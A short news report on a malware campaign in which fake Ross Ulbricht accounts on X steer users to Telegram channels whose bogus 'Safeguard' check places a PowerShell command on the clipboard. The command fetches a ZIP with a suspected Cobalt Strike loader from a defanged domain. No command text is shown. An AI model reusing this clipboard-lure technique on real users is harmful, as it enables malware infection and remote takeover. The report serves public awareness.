Fake Ross Ulbricht Accounts Exploited in Latest Malware Campaign

Ross Ulbricht, known for creating the Silk Road, has been central to discussions about technology’s role in criminal activities. Recently pardoned by US President Donald Trump, a fresh wave of cybercrime has surfaced, using Ulbricht’s case to spread malware.

Taking advantage of the publicity, cybercriminals on X are directing users to a Telegram channel, where they’re tricked into executing PowerShell scripts, resulting in malware infections.

**Ross Ulbricht Malware Campaign**

According to the latest insights from vx-underground researchers, the attack employs a new twist on the “Click-Fix” tactic. Instead of posing as a simple error fix, it masquerades as a captcha or verification step necessary to access the channel. Here, cybercriminals pretend to be Ulbricht using fake verified accounts on X, enticing users to join bogus Telegram channels they claim are official. Users on Telegram face a fake “Safeguard” identity check, leading them to a mini app that creates a counterfeit verification prompt and automatically places a PowerShell command on their clipboard.

Users are then prompted to execute the command through the Windows Run dialog, initiating a sequence of actions. The command downloads a PowerShell script, which fetches a ZIP file from http://openline[.]cyou. This ZIP contains several files, including identity-helper.exe, suspected to be a Cobalt Strike loader—a tool often used by attackers for remote access and conducting ransomware or data theft operations. The instructions are crafted to evade detection.

**Twitter Update**
For the latest updates on this development, follow discussions and expert insights on Twitter.